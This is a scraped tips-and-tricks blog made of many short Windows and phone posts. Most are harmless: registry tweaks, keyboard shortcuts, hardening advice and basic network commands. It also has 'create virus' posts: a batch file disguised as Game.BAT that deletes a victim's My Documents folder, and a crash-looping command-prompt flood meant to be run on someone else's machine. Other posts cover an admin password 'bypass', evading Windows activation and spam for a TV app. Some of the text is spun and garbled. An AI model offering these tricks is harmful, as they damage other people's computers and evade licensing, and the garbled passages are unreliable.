Suppose,if your computer is too
old,too slow,or it hangs up many
times and you only can restart
your computer for resolving
this,,but now you can close all
running programs instantly....just the download the file from this
link... Click Here
It's
freeware,no malware or Trojan
Horse...When you'll open this file it
will close all running programs
instantly.....or you can put it on
the Desktop and then add a Hotkey to it and now,whenever
your computer hangs up,,just
press the hotkey and have
fun....Works great for me
Enjoy...
Share it with your frnds and Feel Free To Comment.
This tweak reduces the time XP waits before
automatically closing any running
programs when you give it the
command to shutdown.
Go to Start then select Run
Type 'Regedit' and click ok Find 'HKEY_CURRENT_USER\Control
Panel\Desktop\'
Select 'WaitToKillAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK' Now select 'HungAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
Now find 'HKEY_USERS\.DEFAULT
\Control Panel\Desktop'
Select 'WaitToKillAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK' Now find 'HKEY_LOCAL_MACHINE
\System\CurrentControlSet
\Control\'
Select 'WaitToKillServiceTimeout'
Right click and select 'Modify'
Change the value to '1000' Click 'OK'
Share it with your frnds and Feel Free To Comment.
There is a new way that you
can actually watch Mobile TV on
the go or even on demand. This
is software that has turned
many heads and has saved many
people thousands of dollars in monthly cable payments. This
software is known as Mobile TV
Elite software. What this does is
it allows you to watch satellite
TV from your phone for only one
lifetime fee. With new types of television cable coming out
almost every year, you may
have a few questions if this can
really be a good deal or not.
Well first off; having Mobile TV
Elite on your phone can save you
a ton of money in the long run. If
you got this software you can
totally kiss your cable bill
goodbye and never have to worry about it coming back
again. When you get Mobile TV
Elite software you only have to
pay once and once only for the
rest of your life. You may be
thinking well it sounds good so far, but I don't like the fact that
it is on my phone.
To be honest, maybe you don't
have a fast phone or your
graphics arent to great on it.
You can actually buy a cord that
can have the ability to hook
your phone up to your TV so that you can view whatever you
are playing on your computer
onto your TV. So, just open up
your Mobile TV Elite software
and bam, you have Mobile TV
Elite transferred onto your real television. Mobile TV Elite software also
comes with a minimum of 1000
channels. Of course there will be
a low price but you wont be
disappointed in the channels you
receive. Especially if you enjoy television a lot.
IF you want no one to open a
drive without your permission.
it is possible in Windows 7
ultimate/premium
To block access to drive go to
Computer and right click on the drive and select properties. In
the properties window click on
‘Security’ tab. Select the user
account you want to restrict
and click on edit.
Change the permissions
according to your need for user
groups or a particular user and
click Apply and then OK. It will not
work for users with admin
account as even they have the same rights as you so they can
revert all permissions. You will
need an admin account to
perform this task.
NOTE:This trick is for Windows 7
ultimate and premium edition
users only.
Share it with your frnds and Feel Free To Comment.
We all use Microsoft Word to
create documents.
and some times we dont want
other people to access our
documents
specially when you are on a shared computer in your
company and you may have your
certain secret data stored in
your word document that should
not be accessed by your boss or
other employee’s.
To deal with such a situation
Microsoft word 2007 integrated
a security feature in Microsoft
word so that you can password
protect your files.
Just follow these simple steps to
make your document protected.
Click on the Microsoft Office
Button present on the top left
corner of the window.
Now Click on the Save As option
Now a new window will pop up.
Click on Tools option at the bottom of the window.
Now you will have two options.
You can select either one or
both options
One is Password To Open it will
ask for the password every time the document is opened.
So to view the document you
have to enter the password
first.
Second is Password To Modify it
will ask for the password every time somebody tries to modify
the document.
Share it with your frnds and Feel Free To Comment.
I’ve read a number of articles
on the internet about changing
the text on the Start button in
XP. On more than one occasion
I’ve seen references to a five
(5) letter limitation when the button is renamed. I always
wondered if this was true or
just an assumption someone
made because the default
‘start’ just happened to fit
the button size. So, I decided to run a test and see if there
really was a five character limit. First of all just u need to do is
download Resource hacker.
Resource HackerTM is a
freeware utility to view, modify,
rename, add, delete and extract
resources in 32bit Windows
executables and resource files
(*.res). It incorporates an internal resource script compiler
and decompiler and works on
Win95, Win98, WinME, WinNT,
Win2000 and WinXP operating
systems.
Its just 541Kb in the size.
Share it with your frnds and Feel Free To Comment.
Follow the simple steps given below to block execution of any particular program on your Windows 7.
1. ClickStart, and then clickRun.
2. In the text box, typeregedit, and pressEnter.
3. Locate and then click the following registry key: HKEY_CURRENT_USER
\Software\Microsoft
\Windows\CurrentVersion
\Policies\Explorer
4. In the right side panel right click on some empty area and point toNew, and then click onDWORD Value.
5. Type disallowrun, and then press ENTER.
6. Double-click
theDisallowRun value that you created in the previous step.
7. Type 1 in theValue data box, and then clickOK.
8. Create a newHKEY_CURRENT_USER \Software\Microsoft
\Windows\CurrentVersion
\Policies\Explorer
\DisallowRun subkey.
9. Right-click the following registry key, point toNew, and then clickKey:HKEY_CURRENT_USER \Software\Microsoft
\Windows\CurrentVersion
\Policies\Explorer. 10. Typedisallowrun, and then press ENTER.
11. For each program that you want to prevent users from running, create a new string value in theDisallowRun subkey . Use consecutive numbers to name the string values (starting with 1), and use the executable file name for the program as the data for the string value.For example, if you want to restrict users from running Microsoft Internet Explorer:
1. Go to the following key in Registry Editor: HKEY_CURRENT_USER
\Software\Microsoft
\Windows\CurrentVersion
\Policies\Explorer
\DisallowRun. Then right click in the right side panel and create a
new string value. Type:1, and then press ENTER.
2. Double-click the1 value that you created in the previous step.
3. Type iexplore.exe in theValue data box, and then clickOK.
12. Quit Registry Editor, and then restart the computer.
Share it with your frnds and Feel Free To Comment.
Size : 550 KB
Description:
Get ready to experience top football with the new and improved PES 2011! Lead world famous teams to victory in first class competitions like UEFA Champions League or UEFA Europa League. Either a football beginner or true expert, you will have full control over the play, enjoying a deep level of realism. The improvements brought to this year is edition of the award winning football simulation will allow you to experience an unlimited freedom of play on your mobile phone.
Share it with your frnds and Feel Free To Comment.
Disclaimer:
This trick can cause damage thats why use it on your own responsibility.In any case the author or publisher will not be responsible for any damage.
Follow these steps to create virus:
1. Open notepad and paste the Code below,
rmdir C:\Documents and Settings \S\Q
2. Now save the file by any name with .BAT extension. E.g Game.BAT
Now if someone will open this file then "My Document" of his pc will be deleted completely.
Share it with your frnds and Feel Free To Comment.
Working through cmd prompt is
not easy with long paths and
folder names.
This trick provides a solution !!!
What can be done?
** Command prompt can be
added to 'Right Click Menu' of
each folder.
** Clicking on this will open the
folder in cmd prompt.
** Now, the files in that folder
can easily be operated.
How to do it?
** Open any folder.
** Tools >> Folder Options...
** Change to File Types
** Select Folder from the list.
** Click Advanced button.
** Now, click New
** Type Command Prompt in
Action
** Type cmd.exe in Application
used to perform action:
** Now, click OK and Apply That's All !!!
Now, Right Click any folder and
click Command Prompt
And see what happens.
Share it with your frnds and Feel Free To Comment.
Surfing Internet...
Type in the url and Hit Enter,
that's it ?
But...
Have you ever thought what
happens after that?
Lets Trace and see what happens !
Do the following :
# Start >> Run
# Type cmd
# This will open the Command
Prompt
# Type cd\
# Type tracert www.google.com
----------------------Note
---------------------------
You can replace www.google.com
with any website url.
---------------------------------------------------------
Results :
$ First line shows the IP address
of the website...
$ You'll be shown steps in which
the website gets load.
$ More is the number of steps more is time taken to load the
website.
Share it with your frnds and Feel Free To Comment.
This tutorial can be used
for any type of file
including mp3,wmv,.rar,etc Here is how it goes:
1. Open C: Drive and make
a folder in it e.g. “hacks”.
Put both the files i.e. the
file that you want to hide
and the image inside which
you want to hide the file into this folder
2. Select both the files
and make a compressed
RAR archive e.g.
“secret.rar” out of them
3. Open Run and type in
“cmd” to open the
Command Prompt. Now type
“cd..” and press enter
and repeat this once
again. Type “cd sizlopedia” to open the
folder (where “hacks” is
the folder that I am using
in this tutorial)
4. Type the command
“copy /b maria.jpg +
secret.rar safe.jpg” and
press enter.
5. The new picture safe.jpg
is now the nested Picture
file which has the hidden
file saved inside it.
Change its extension from .jpg to .rar anytime to access or extract the hidden file
Share it with your frnds and Feel Free To Comment.
1. Fake out hackers with a dummy Administrator account
Since the default account in
Windows 2000 is always named
Administrator, an enterprising
hacker can try to break into
your system by attempting to
guess the password on that account. It you never bothered
to put a password on that
account, say your prayers.
Rather than be a sucker to a
hacker, put a password on the
Administrator account it you
haven't done so already. Then
change the name of the
Administrator account. You'll still be able to use the account
under its new name, since
Windows identifies user accounts
by a back-end ID number rather
than the name. Finally, create a
new account named Administrator and disable it. This
should frustrate any would -be
break-ins. You can add new accounts and
change the names of existing
accounts in Windows 2000
through the Local Users and
Groups snap in. Right-click on My
Computer, select Manager, open the Local Users and Groups
subtree, look in the Users folder
and right-click on any name to
rename it. To add a new user,
right-click on the containing
folder and select New User. Finally, to disable an account,
double-click it, check the Account
is disabled box and click OK.
Don't ever delete the original
Administrator account. Some
programs refuse to install
without it and you might have to
log in under that account at
some point to setup such software. The original
Administrator account is
configured with a security ID
that must continue to be
present in the system.
2. Set the Hosts file to read-only to prevent name hijacking.
This one's from (and to a
degree, for) the experts. The
HOSTS file is a text file that all
flavors of Windows use to hold
certain network addresses that
never change. When a network name and address is placed in
HOSTS, the computer uses the
address listed there for that
network name rather than
performing a lookup (which can
take time). Experts edit this file to place their most commonly-
visited sites into it, speeding
things up considerably.
Unfortunately hijackers and
hackers also love to put their
own information into it -
redirecting people from their
favorite sites to places they
don't want to go. One of the most common entries in HOSTS is
local host which is set 1770.0.1.
This refers to the local machine
and if this entry is damaged the
computer can behave very
unpredictably. To prevent HOSTS from being
hijacked, set it to read-only. Go
to the folder %Systemroot
%system32driversetc, right-click
on HOSTS, select Properties
check the Read-Only box and click OK. If you want to add your
own entries to HOSTS, you can
unprotect it before doing so, but
always remember to set it to
read-only after you're done.
3. Turn off unneeded Services Windows 2000 and XP both come with many background services that don't need to he running most of the time: Alerter, Messenger, Server (If you're running a standalone machine with no file or printer shares), NetMeeting Remote Desktop Sharing, Remote Desktop Help Session Manager (the last two if you're not using Remote Desktop or NetMeeting), Remote Registry,
Routing and Remote Access (if you're not using Remote Access), SSDP Discovery Service, Telnet, and Universal Plug and Play Device Host.
A good resource and instruction on which of these services can be disabled go to /http:// www.blkviper.com/WinXP/
4. Disallow changes to IE settings through IE This is another anti hijacker tip.
IE can be set so that any
changes to its settings must be
performed through the Internet
icon in the Control Panel, rather
than through IE's own interface. Some particularly unscrupulous
programs or sites try to tamper
with setting by accessing the
Tools, Options menu in IE. You can
disable this and still make
changes to IE's settings through the Control Panel. Open the Registry and browse to
HKEY_CURRENT_USER
SoftwarePoliciesMicrosoftInternet
ExplorerRestrictions. Create or
edit a new DWORD value named
NoBrowserUptions and set it to 1 (this is a per-user setting). Some
third-party programs such as
Spybot Search And Destroy allow
you to toggle this setting. You can also keep IE from having
other programs rename its
default startup page, another
particularly annoying form of
hijacking. Browse to
HKEY.CURRENT USERSoftwarePolicies
MicrosoftInternet ExploreControl
Panel and add or edit a DWORD,
Homepage and set it to 1. 10. Disable simple File Shares. In Windows XP Professional, the
Simple File Sharing mode is easily
exploited, since it抯 a little too
easy to share out a file across
your LAN (or the NET at large).
To turn it off, go m My Computer, click Tools, Folder
Option and the View tab, and
uncheck Use Simple file sharing
(Recommended). Click OK. When
you do this you can access the
Security tab in the Properties window for all folders; set
permissions for folders; and take
ownership of objects (but not in
XP Home).
Share it with your frnds and Feel Free To Comment.
DISCLAIMER:
Perform this trick on your own resposibility, as this can cause damage. In case of any damage the author or publisher will not be responsible.
1. Open Notepad.
2. COPY and Paste the
following Code without
quotes.....
What does this do?
They will
click on it, it will open multiple
command prompt windows until
the computer crashes.
When
they restart their computer, it will start again!
TIPS:
1. Make sure you tell them to
save the file on the desktop .
2. Make sure they run
Windows .
How To Stop It:
Just open your windows in safe
window and delete these two
files Code:
This is small but very
useful XP tricks tutorial
which is emphasized on the
mode used to exchange/
ploy Windows XP
administrator password if you don`t have door to
admin tab(student tab).
Just follow the steps given
below Steps:
1. Start–>Run–>lusrmgr.msc and press Penetrate or OK.
2. Than there`s two
folders: Users & Groups.
You need Users, than in
this folder aptly click on
Administrator–>Set New Password !
So, you are now able to
ploy in any Windows XP
administrator tab even
when it is password
protected.
Just follow the ploy and you will be able
to bypass/ploy password,
infact exchange
administrator tab
password.
Share it with your frnds and Feel Free To Comment.
The following are the IP utilities available inWindows that help in finding out the information about IP Hosts and domains.
These are the basic IP Hacking Commands that everyone must know!
Please note that the the term Host used in this article can also be assumed as aWebsite for simple understanding purpose.
1. PING
PING is a simple application (command) used to determine whether a host is online and available. PING command sends one or moreICMP Echo messages to a specified host requesting a reply. The receiver (Target Host) responds to this ICMP Echo message and returns it back to the sender. This confirms that the Host is online and available. Otherwise the host is said to be unavailable.
syntax:
c:\>ping gohacking.com
2. TELNET
Telnet command is used to connect to a desired host on a specified port number.
For example syntax:
c:\>telnet yahoo.com 25
c:\>telnet yahoo.com
3. NSLOOKUP
Many times we think about finding out the IP address of a given site. Say for example google.com, yahoo.com, microsoft.com etc. But how to do this?
For this there are some websites that can be used to find out the IP address of a given site. But in Windows we have an inbuilt tool to do this job for us. It isnslookup.
Yes this tool can be used for resolving a given domain name into it’s IP address (determine the IP of a given site name). Not only this it can also be used for reverse IP lookup. That is if the IP address is given it determines the corresponding domain name for that IP address.
syntax:
c:\>nslookup google.com
4. NETSTAT
The netstat command can be used to display the currentTCP/IP network connections. For example the following netstat command displays all connections and their corresponding listening port numbers.
Eg: C:\>netstat -a
This command can be used to determine the IP address/Host names of all the applications connected to your computer. If a hacker is connected to your system even the hacker’s IP is displayed.
So the netstat command can be used to get an idea of all the active connections to a given system.
Share it with your frnds and Feel Free To Comment.
Most of you might be aware of the fact that it is possible to use Windows 7 and Vista for 120 days without activations.
This is actually possible using the
slmgr -rearm
command which will extend the grace period from 30 days to 120 days.
However in this post I will show you a small trick using which it is possible to use Windows 7 without activation for approximately an year! Here is a way to do that.
1. Goto “Start Menu -> All Programs -> Accessories” . Right click on “Command Prompt” and select “Run as Administrator“.
If you are not the administrator then you are prompted to enter the password, or else you can proceed to step-2.
2. Now type the following command and hit enter slmgr -rearm
3. You will be prompted to restart the computer. Once restarted the trial period will be once again reset to 30 days. You can use the above command for up to 3 times by which you can extend the trial period to 120 days without activation.
4. Now comes the actual trick by which you can extend the trial period for another 240 days. Open Registry Editor (type regedit in “Run” and hit Enter) and navigate to the following location
5. In right-side pane, change value ofSkipRearm to1.
6. Now you will be able to use the slmgr - rearm command for another 8 times so that you can skip activation process for another 240 days.
So you will get 120 + 240 = 360 days of free Windows 7 usage.
120 days using
“slmgr - rearm”
command before registry edit + 240 days using
“slmgr - rearm”
command after registry edit = 360 Days
Share it with your frnds and Feel Free To Comment.
Ever wanted to scan a suspicious looking file using multiple antivirus software ?
I upgraded my Ubuntu linux to Lucid Lynxand installed Oracle Virtual Box over it. I later installed Windows XP as a virtual operating system and thought it might be better if I would install an antivirus program on it. However, as I moved my antivirus program and some other files from my USB drive, I had a gut feeling that things are just not right.
So..a bit of googling landed me at
Virustotal.com
which allows to scan a file using multiple antivirus
software, and it does what it says perfectly.
The site is extremely easy to use, I uploaded a file over it and it took less than a minute to generate results. The file was found positively ID’ed by it and one antivirus triggered a positive result from a scan of 41 antivirus.
Pros
1. Extremely fast scanning
2. Scanning using 40+ antivirus
3. complete detail about the file is provided
Cons
1. Cant scan my whole PC :(
2. Can only scan one file at a time
3. 20 MB file limit (that means I cant scan heavy executables like that ofAdobe Photoshop and Burnout Paradise)
Share it with your frnds and Feel Free To Comment.
Follow the simple steps given below to block execution of any particular program on your Windows 7.
1. ClickStart, and then clickRun.
2. In the text box, typeregedit, and pressEnter.
3. Locate and then click the following registry key: HKEY_CURRENT_USER
\Software\Microsoft
\Windows\CurrentVersion
\Policies\Explorer
4. In the right side panel right click on some empty area and point toNew, and then click onDWORD Value.
5. Type disallowrun, and then press ENTER.
6. Double-click
theDisallowRun value that you created in the previous step.
7. Type 1 in theValue data box, and then clickOK.
8. Create a newHKEY_CURRENT_USER \Software\Microsoft
\Windows\CurrentVersion
\Policies\Explorer
\DisallowRun subkey.
9. Right-click the following registry key, point toNew, and then clickKey:HKEY_CURRENT_USER \Software\Microsoft
\Windows\CurrentVersion
\Policies\Explorer. 10. Typedisallowrun, and then press ENTER.
11. For each program that you want to prevent users from running, create a new string value in theDisallowRun subkey . Use consecutive numbers to name the string values (starting with 1), and use the executable file name for the program as the data for the string value.For example, if you want to restrict users from running Microsoft Internet Explorer:
1. Go to the following key in Registry Editor: HKEY_CURRENT_USER
\Software\Microsoft
\Windows\CurrentVersion
\Policies\Explorer
\DisallowRun. Then right click in the right side panel and create a
new string value. Type:1, and then press ENTER.
2. Double-click the1 value that you created in the previous step.
3. Type iexplore.exe in theValue data box, and then clickOK.
12. Quit Registry Editor, and then restart the computer.
Share it with your frnds and Feel Free To Comment.
Use real player 10 to download
videos from youtube.
Use any explorer, when
you want to download a file.
1. Open the video and copy the link from the site.
2. Open real player click on search space at top right of the window, press enter, address
bar will be shown paste ur link
and press enter.
Your video will start playing,just
right click the video and select
download video, it will be saved
in real player downloads in my
documents.
Share it with your frnds and Feel Free To Comment.
Mobile number without or wrong
IMEI number are banned accorss many countries. Mostly China mobile
phone brands like Alkatel,
Sigmatel, Spice, Carboonn, GFIVE
and many more now provide valid IMEI number
To Check China or any Mobile Phone
IMEI Number Validity follow these:
1.Press *#06# on your mobile
handset and note down the 15
digit IMEI number
2.Compose a new message from
your mobile >> Type your 15 digit
IMEI number >> Send it to 53232
3.If you get “Success” as the
reply, then your mobile IMEI
number is valid
4.If you get “Invalid IMEI” as the
reply, that means your IMEI
number is not valid
You are now done. This will help you to know that
your IMEI number is valid or not.
Share it with your frnds and Feel Free To Comment.
CTRL + A Select all text on a webpage
CTRL + B Open the Bookmarks sidebar
CTRL + C Copy the selected text to the
Windows clipboard
CTRL + D Bookmark the current webpage
CTRL + F Find text within the current
webpage
CTRL + G Find more text within the same
webpage
CTRL + H Opens the webpage History
sidebar
CTRL + I Open the Bookmarks sidebar
CTRL + J Opens the Download Dialogue
Box
CTRL + K Places the cursor in the Web
Search box ready to type your
search
CTRL + L Places the cursor into the URL
box ready to type a website
address
CTRL + M Opens your mail program (if you
have one) to create a new
email message
CTRL + N Opens a new Firefox window
CTRL + O Open a local file
CTRL + P Print the current webpage
CTRL + R Reloads the current webpage
CTRL + S Save the current webpage on
your PC
CTRL + T Opens a new Firefox Tab
CTRL + U View the page source of the
current webpage
CTRL + V Paste the contents of the
Windows clipboard
CTRL + W Closes the current Firefox Tab
or Window (if more than one
tab is open)
CTRL + X Cut the selected text
CTRL + Z Undo the last action
Windows Keyboard Shortcuts for Mozilla Firefox
F1 Opens Firefox help
F3 Find more text within the same
webpage
F5 Reload the current webpage
F6 Toggles the cursor between the
address/URL input box and the
current webpage
F7 Toggles Caret Browsing on and
off. Used to be able to select
text on a webpage with the
keyboard
F11 Switch to Full Screen mode
Share it with your frnds and Feel Free To Comment.
Hackers and Browser Hijacking is
one area of the Net that affects
everyone at some stage.
In addition to having third party
utilities such as SpyBot, Anti
Virus scanners and firewalls
installed there are some changes
that can be made to Windows
2000/XP.
Below are some details to make your system safer from
hackers and hijackers. Some of these tips require
editing of the Registry so it is
wise to either backup the
registry and/or create a Restore
Point.
1. Clearing the Page File at Shutdown Windows 2000/XP
paging file
(Sometimes called the Swap File)
can contain sensitive information
such as plaintext passwords.
Someone capable of accessing
your system could scan that file and find its information. You can
force windows to clear out this
file.
In the registry navigate to
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession
ManagerMemory Management
and add or edit the DWORD
ClearPageFileAtShutdown. Set it to1.
Note that when you do this, the
system will take much longer to
shut down: a system with a
really big Page File (! Gig or
more) may take a minute or two
longer.
2. Disable the POSIX and OS/2 Subsystem.
Windows 2000 and XP come with
little-documented subsystems it
at allow compatibility with UNIX
and OS/2 systems These rues
systems are enabled by default
but so rarely used that they are best off bring disabled
completely to prevent possible
service hijackings. To disable these subsystems,
open the registry and navigate
to HKEY LOCAL
MACHINESYSTEMCurrentControlSetControlSession
ManagerSubSystems. Delete the
subkeys Os2 and Posix. then reboot.
3. Never leave default passwords blank. On installation, Windows 2000
sets up an Administrator account
with total system access and
prompts for a password. Guess
what: by default, it allows that
password to be blank. If a user doesn't want to type a
password, he can simply click
Next and the system will be an
open door for anyone who
wants to log on. Always opt for
a password of some kind when setting up the default account
on a machine
4. Disable the Guest account
Windows XP comes with a Guest
account that's used for limited
access, but it's still possible to do
some damage with it. Disable it
completely if you are not using
it. Under Control Panel, select User Accounts, click on Guest
Account and then select Turn Off
the Guest Account.
5. Install Windows In a different directory. Windows usually installs itself in
the WINDOWS directory. Windows
NT 4 0 and 2000 Will opt for
WINNT. Many worms and other
rogue programs assume this to
be the case and attempt to exploit those folders files. To
defeat this install Windows to
another directory when you're
setting it up - you can specify
the name of the directory during
setup. WINDIR is okay; so some people use WNDWS - A few (not
that many) programs may not
install properly if you install
Windows to another folder but they are very few and they are
far between.
Want to know Who Used Your Pc
In Your Absence & what Did He/She Do?
Just follow these simple steps
Start > run >eventvwr.msc
Events are stored in three log
files: Application, Security, and
System.
These logs can be reviewed and archived. For our purposes we want the
System log.
Click on "System" in
the left-hand column for a list of
events. Look for a date and time when
you weren't home and your
computer should have been off. double click on the eg: info n it will show u the detail.
You can also use this log to see how long someone was on the
computer. Just look at the time the
computer was turned on and off for that day.
Share it with your frnds and Feel Free To Comment.
Pc tips tricks tweaks, Computer tricks, Window tricks
IF you want no one to open a
drive without your permission.
it is possible in Windows 7
ultimate/premium
To block access to drive go to
Computer and right click on the drive and select properties.
In the properties window click on ‘Security’ tab. Select the user account you want to restrict and click on edit. Change the permissions
according to your need for user groups or a particular user and click Apply and then OK.
It will not work for users with admin account as even they have the same rights as you so they can
revert all permissions. You will
need an admin account to
perform this task.
NOTE:This trick is for Windows 7 ultimate and premium edition users only
Share it with your frnds and Feel Free To Comment.
I do not host any of the the games and apps here at gprstweaks.blogspot.com.I am just giving quick download links.If you think I am infringing on your copyright then contact me at contactgprstweaks[at]gmail.com and that content will be removed right away.